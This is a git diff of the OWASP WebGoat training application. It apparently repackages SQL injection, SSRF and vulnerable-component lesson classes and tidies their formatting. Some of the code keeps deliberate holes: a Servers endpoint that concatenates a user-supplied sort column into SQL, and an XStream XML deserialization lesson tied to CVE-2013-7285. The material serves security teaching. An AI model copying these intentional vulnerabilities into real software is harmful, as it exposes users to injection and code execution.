@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
@@ -117,4 +117,4 @@ public class SqlInjectionLesson5a extends AssignmentEndpoint {
         t.append("</p>");
         return (t.toString());
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson5b.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5b.java
similarity index 93%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson5b.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5b.java
index 7b0f7effa..fc1b37a72 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson5b.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5b.java
@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
@@ -95,4 +95,4 @@ public class SqlInjectionLesson5b extends AssignmentEndpoint {
             return failed(this).output(this.getClass().getName() + " : " + e.getMessage() + "<br> Your query was: " + queryString.replace("?", login_count)).build();
         }
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson8.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson8.java
similarity index 94%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson8.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson8.java
index ac3a9c230..949ba155e 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson8.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson8.java
@@ -21,12 +21,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson9.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson9.java
similarity index 93%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson9.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson9.java
index dddb8555a..77dab2cea 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson9.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson9.java
@@ -21,12 +21,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/Servers.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/Servers.java
similarity index 67%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/Servers.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/Servers.java
index c3d952247..43e290e10 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/Servers.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/Servers.java
@@ -20,18 +20,19 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sql_injection.mitigation;
 
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.LessonDataSource;
+import org.owasp.webgoat.container.LessonDataSource;
 import org.springframework.http.MediaType;
-import org.springframework.web.bind.annotation.*;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
 
-import java.sql.Connection;
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
 import java.util.ArrayList;
 import java.util.List;
 
@@ -67,12 +68,14 @@ public class Servers {
     public List<Server> sort(@RequestParam String column) throws Exception {
         List<Server> servers = new ArrayList<>();
 
-        try (Connection connection = dataSource.getConnection();
-             PreparedStatement preparedStatement = connection.prepareStatement("select id, hostname, ip, mac, status, description from servers  where status <> 'out of order' order by " + column)) {
-            ResultSet rs = preparedStatement.executeQuery();
-            while (rs.next()) {
-                Server server = new Server(rs.getString(1), rs.getString(2), rs.getString(3), rs.getString(4), rs.getString(5), rs.getString(6));
-                servers.add(server);
+        try (var connection = dataSource.getConnection()) {
+            try (var statement = connection.prepareStatement("select id, hostname, ip, mac, status, description from SERVERS where status <> 'out of order' order by " + column)) {
+                try (var rs = statement.executeQuery()) {
+                    while (rs.next()) {
+                        Server server = new Server(rs.getString(1), rs.getString(2), rs.getString(3), rs.getString(4), rs.getString(5), rs.getString(6));
+                        servers.add(server);
+                    }
+                }
             }
         }
         return servers;
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlInjectionLesson10a.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson10a.java
similarity index 90%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlInjectionLesson10a.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson10a.java
index d590e88f3..9758f061b 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlInjectionLesson10a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson10a.java
@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sql_injection.mitigation;
 
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlInjectionLesson10b.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson10b.java
similarity index 96%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlInjectionLesson10b.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson10b.java
index ef608e669..b8aedf8d4 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlInjectionLesson10b.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson10b.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sql_injection.mitigation;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlInjectionLesson13.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson13.java
similarity index 89%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlInjectionLesson13.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson13.java
index bf3d9d568..9c5c733f8 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlInjectionLesson13.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson13.java
@@ -20,13 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sql_injection.mitigation;
 
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
@@ -65,4 +65,4 @@ public class SqlInjectionLesson13 extends AssignmentEndpoint {
             return (failed(this).build());
         }
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlInjectionMitigations.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionMitigations.java
similarity index 89%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlInjectionMitigations.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionMitigations.java
index c69721f17..08ebb39d6 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlInjectionMitigations.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionMitigations.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sql_injection.mitigation;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 @Component
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlOnlyInputValidation.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidation.java
similarity index 86%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlOnlyInputValidation.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidation.java
index 0bfa5baf3..02720313b 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlOnlyInputValidation.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidation.java
@@ -21,12 +21,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sql_injection.mitigation;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.sql_injection.advanced.SqlInjectionLesson6a;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.lessons.sql_injection.advanced.SqlInjectionLesson6a;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlOnlyInputValidationOnKeywords.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationOnKeywords.java
similarity index 87%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlOnlyInputValidationOnKeywords.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationOnKeywords.java
index c6015ada9..89285cb2a 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/mitigation/SqlOnlyInputValidationOnKeywords.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationOnKeywords.java
@@ -21,12 +21,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sql_injection.mitigation;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.sql_injection.advanced.SqlInjectionLesson6a;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.lessons.sql_injection.advanced.SqlInjectionLesson6a;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/ssrf/src/main/java/org/owasp/webgoat/ssrf/SSRF.java b/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRF.java
similarity index 91%
rename from webgoat-lessons/ssrf/src/main/java/org/owasp/webgoat/ssrf/SSRF.java
rename to src/main/java/org/owasp/webgoat/lessons/ssrf/SSRF.java
index 6880eee38..ac318d3e6 100644
--- a/webgoat-lessons/ssrf/src/main/java/org/owasp/webgoat/ssrf/SSRF.java
+++ b/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRF.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.ssrf;
+package org.owasp.webgoat.lessons.ssrf;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/webgoat-lessons/ssrf/src/main/java/org/owasp/webgoat/ssrf/SSRFTask1.java b/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask1.java
similarity index 92%
rename from webgoat-lessons/ssrf/src/main/java/org/owasp/webgoat/ssrf/SSRFTask1.java
rename to src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask1.java
index 171568c02..5b797db24 100644
--- a/webgoat-lessons/ssrf/src/main/java/org/owasp/webgoat/ssrf/SSRFTask1.java
+++ b/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask1.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.ssrf;
+package org.owasp.webgoat.lessons.ssrf;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/ssrf/src/main/java/org/owasp/webgoat/ssrf/SSRFTask2.java b/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask2.java
similarity index 92%
rename from webgoat-lessons/ssrf/src/main/java/org/owasp/webgoat/ssrf/SSRFTask2.java
rename to src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask2.java
index f0415676e..4dd4f2759 100644
--- a/webgoat-lessons/ssrf/src/main/java/org/owasp/webgoat/ssrf/SSRFTask2.java
+++ b/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask2.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.ssrf;
+package org.owasp.webgoat.lessons.ssrf;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/Contact.java b/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/Contact.java
similarity index 95%
rename from webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/Contact.java
rename to src/main/java/org/owasp/webgoat/lessons/vulnerable_components/Contact.java
index e02915781..6de35f8ef 100644
--- a/webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/Contact.java
+++ b/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/Contact.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.vulnerable_components;
+package org.owasp.webgoat.lessons.vulnerable_components;
 
 public interface Contact {
 
@@ -32,4 +32,4 @@ public interface Contact {
 	public void setLastName(String lastName);
 	public String getEmail();
 	public void setEmail(String email);
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/ContactImpl.java b/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/ContactImpl.java
similarity index 95%
rename from webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/ContactImpl.java
rename to src/main/java/org/owasp/webgoat/lessons/vulnerable_components/ContactImpl.java
index 951c2f678..586bad23a 100644
--- a/webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/ContactImpl.java
+++ b/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/ContactImpl.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.vulnerable_components;
+package org.owasp.webgoat.lessons.vulnerable_components;
 
 import lombok.Data;
 
@@ -32,4 +32,4 @@ public class ContactImpl implements Contact {
 	private String lastName;
 	private String email;
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/VulnerableComponents.java b/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponents.java
similarity index 89%
rename from webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/VulnerableComponents.java
rename to src/main/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponents.java
index 384cf4ba7..0d444f9aa 100644
--- a/webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/VulnerableComponents.java
+++ b/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponents.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.vulnerable_components;
+package org.owasp.webgoat.lessons.vulnerable_components;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 @Component
diff --git a/webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/VulnerableComponentsLesson.java b/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponentsLesson.java
similarity index 74%
rename from webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/VulnerableComponentsLesson.java
rename to src/main/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponentsLesson.java
index fad32a00d..c5598c0e6 100644
--- a/webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/VulnerableComponentsLesson.java
+++ b/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponentsLesson.java
@@ -20,13 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.vulnerable_components;
+package org.owasp.webgoat.lessons.vulnerable_components;
 
 import com.thoughtworks.xstream.XStream;
 import org.apache.commons.lang3.StringUtils;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
@@ -44,25 +44,25 @@ public class VulnerableComponentsLesson extends AssignmentEndpoint {
         xstream.alias("contact", ContactImpl.class);
         xstream.ignoreUnknownElements();
         Contact contact = null;
-        
+
         try {
-        	if (!StringUtils.isEmpty(payload)) {
-        		payload = payload.replace("+", "").replace("\r", "").replace("\n", "").replace("> ", ">").replace(" <", "<");
-        	}
+            if (!StringUtils.isEmpty(payload)) {
+                payload = payload.replace("+", "").replace("\r", "").replace("\n", "").replace("> ", ">").replace(" <", "<");
+            }
             contact = (Contact) xstream.fromXML(payload);
         } catch (Exception ex) {
             return failed(this).feedback("vulnerable-components.close").output(ex.getMessage()).build();
         }
-        
+
         try {
-            if (null!=contact) {
-            	contact.getFirstName();//trigger the example like https://x-stream.github.io/CVE-2013-7285.html
-            } 
+            if (null != contact) {
+                contact.getFirstName();//trigger the example like https://x-stream.github.io/CVE-2013-7285.html
+            }
             if (!(contact instanceof ContactImpl)) {
-            	return success(this).feedback("vulnerable-components.success").build();
+                return success(this).feedback("vulnerable-components.success").build();
             }
         } catch (Exception e) {
-        	return success(this).feedback("vulnerable-components.success").output(e.getMessage()).build();
+            return success(this).feedback("vulnerable-components.success").output(e.getMessage()).build();
         }
         return failed(this).feedback("vulnerable-components.fromXML").feedbackArgs(contact).build();
     }
diff --git a/webgoat-lessons/webgoat-introduction/src/main/java/org/owasp/webgoat/introduction/WebGoatIntroduction.java b/src/main/java/org/owasp/webgoat/lessons/webgoat_introduction/WebGoatIntroduction.java
similarity index 90%
rename from webgoat-lessons/webgoat-introduction/src/main/java/org/owasp/webgoat/introduction/WebGoatIntroduction.java
rename to src/main/java/org/owasp/webgoat/lessons/webgoat_introduction/WebGoatIntroduction.java
index e4d77e67d..6f726d9f2 100644
--- a/webgoat-lessons/webgoat-introduction/src/main/java/org/owasp/webgoat/introduction/WebGoatIntroduction.java
+++ b/src/main/java/org/owasp/webgoat/lessons/webgoat_introduction/WebGoatIntroduction.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.introduction;
+package org.owasp.webgoat.lessons.webgoat_introduction;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/Email.java b/src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/Email.java
similarity index 81%
rename from webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/Email.java
rename to src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/Email.java
index 4f7cc1056..56e33fa7c 100644
--- a/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/Email.java
+++ b/src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/Email.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.webwolf_introduction;
+package org.owasp.webgoat.lessons.webwolf_introduction;
 
 import lombok.Builder;
 import lombok.Data;
@@ -13,4 +13,4 @@ public class Email implements Serializable {
     private String sender;
     private String title;
     private String recipient;
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/LandingAssignment.java b/src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/LandingAssignment.java
similarity index 89%
rename from webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/LandingAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/LandingAssignment.java
index c1477bdc2..19a09a3ad 100644
--- a/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/LandingAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/LandingAssignment.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.webwolf_introduction;
+package org.owasp.webgoat.lessons.webwolf_introduction;
 
 import org.apache.commons.lang3.StringUtils;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.PostMapping;
@@ -63,7 +63,7 @@ public class LandingAssignment extends AssignmentEndpoint {
         modelAndView.addObject("webwolfUrl", landingPageUrl);
         modelAndView.addObject("uniqueCode", StringUtils.reverse(getWebSession().getUserName()));
 
